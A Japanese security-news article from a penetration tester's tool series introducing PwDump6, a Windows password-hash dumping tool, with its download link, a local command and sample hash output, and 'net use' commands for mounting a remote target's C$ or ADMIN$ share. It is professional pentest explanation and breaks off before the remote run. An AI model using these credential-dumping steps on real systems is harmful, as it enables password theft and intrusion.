現役ペンテスト技術者が選ぶ 使えるセキュリティツール(11)「PwDumpシリーズ」 | ScanNetSecurity
2021.06.20(日)

現役ペンテスト技術者が選ぶ 使えるセキュリティツール(11)「PwDumpシリーズ」

このコーナーでは、現役のペネトレーションテスト技術者が、使えるセキュリティツールを、ペンテストの現場の視点から紹介します。

特集 特集
このコーナーでは、現役のペネトレーションテスト技術者が、使えるセキュリティツールを、ペンテストの現場の視点から紹介します。


・名称…PwDumpシリーズ

・分野…ダンピング

・配布制限…GPL

・商用版の有無…無

・類似ツール…

・DL URL…http://swamp.foofus.net/fizzgig/pwdump/

・対応OS…Windows系OS


(1) 基本項目と概要

Windows内に格納されているハッシュ化されたパスワード(以下ハッシュ値)を管理者権限を用いて取得するツールである。取得できたパスワードはハッシュ化されているので当然そのままでは使用することはできない。だが、そのハッシュ値をクラッキング(解析)するツールも存在する。そのツールに関しては別の機会に紹介する。

今回、名称に「シリーズ」と付けたのは、このツールは様々な作者の手で様々な改良を加えられ筆者の把握している限りでは「PwDump7」までリリースされているためである。(中にはPwDump3eやPwDumpXというものも存在する。)
今回は、リモートからもハッシュを取得することができるPwDump6を紹介する。


(2) コマンドサンプル

まずは、ローカルでハッシュ値の取得を行ってみよう。ローカルで実行するには管理者権限でログオンし、引数に自身のIPアドレス、もしくは、マシン名を指定し実行する。

【ローカルでのハッシュ値取得】
C: oolpwdump6>PwDump.exe 127.0.0.1

pwdump6 Version 1.0 by fizzgig and the mighty group at foofus.net
Copyright 2005 foofus.net

〜 略 〜

Administrator:500:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
ASPNET:1003:0DFC661619C403307257C4412C76C3D6:E0DB5F12B184E1B7C428DF219D8C8542:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
IUSR_VICTIM-W2K:1001:9339643A483133C5F148CCED8419DB8C:9EEC81248556914270CBB7DB90D65F7C:::
IWAM_VICTIM-W2K:1002:54A5A4E317A3830FACC9C4E468C7207F:6077983EE0789DC1242BC8CDACFAEF51:::
TsInternetUser:1000:2F0F7C5F5264DE66462979F0C902E19B:AA44FFD5EEE101F33470A40C09835341:::
tsuji:1005:41B020478F5B4014AAD3B435B51404EE:A1059C9934521426A854BB819B6C5CC3:::
Completed.

上記のように取得され表示される内容は、一行あたり、

ユーザ名:uid:ハッシュ

という形式である。

次に、リモートからの取得である。リモートの場合でも、ローカルと同じく管理者権限が必要となる。ヘルプを見る限りでは、実行時にユーザ名とパスワードを指定することでリモートから取得できそうなのだが正しいユーザ名、パスワードを設定しても正常に動作せず、ハッシュ値を取得することはできない。そのため、別の方法で、リモートから管理者権限で対象の共有資源をマウントしておく必要がある。マウントする方法は、下記の通りである。

net use \対象のIPアドレスC$ /user:"ユーザ名" "パスワード"

または

net use \対象のIPアドレスADMIN$ /user:"ユーザ名" "パスワード"

上記コマンドを実行し「コマンドは正常に終了しました。」と表示されればマウントは成功である。PwDumpを実行し、リモートからハッシュ値を取得する準備が整ったことになる。

それでは、実行してみよう…

【執筆:NTTデータ・セキュリティ株式会社 辻 伸弘】
──
※ この記事は Scan購読会員向け記事をダイジェスト掲載しました
購読会員登録案内 http://www.ns-research.jp/cgi-bin/ct/p.cgi?w02_ssw

《ScanNetSecurity》

PageTop

特集

アクセスランキング

  1. パラマウントベッド従業員の仮想デスクトップ環境がウイルス感染、過去のやりとりを装った不審メールを確認

    パラマウントベッド従業員の仮想デスクトップ環境がウイルス感染、過去のやりとりを装った不審メールを確認

  2. スポーツクラブNASへランサムウェア攻撃、会員管理システムに障害発生

    スポーツクラブNASへランサムウェア攻撃、会員管理システムに障害発生

  3. 富士通のプロジェクト情報共有ツールへの不正アクセス、総務省でも被害確認

    富士通のプロジェクト情報共有ツールへの不正アクセス、総務省でも被害確認

  4. 「糖質制限ドットコム」に不正アクセス、1年分の決済情報が流出

    「糖質制限ドットコム」に不正アクセス、1年分の決済情報が流出

  5. 富士フイルムへのランサムウェア攻撃、外部への情報流出の痕跡は確認されず

    富士フイルムへのランサムウェア攻撃、外部への情報流出の痕跡は確認されず

  6. やけど虫の駆除方法、体液が皮膚に付いてしまった場合の対策について

    やけど虫の駆除方法、体液が皮膚に付いてしまった場合の対策について

  7. クラウドの脅威はプロバイダ起因から利用者起因にシフト…CSAJの11大脅威

    クラウドの脅威はプロバイダ起因から利用者起因にシフト…CSAJの11大脅威

  8. 病院向け情報管理システム OpenClinic GA に複数の脆弱性

    病院向け情報管理システム OpenClinic GA に複数の脆弱性

  9. かくれ脱水から脱水状態に進行したときに起こるサインを解説(「教えて!「かくれ脱水」委員会)

    かくれ脱水から脱水状態に進行したときに起こるサインを解説(「教えて!「かくれ脱水」委員会)

  10. Apache HTTP Web Server 2.4 の複数の脆弱性へアップデート公開

    Apache HTTP Web Server 2.4 の複数の脆弱性へアップデート公開

ランキングをもっと見る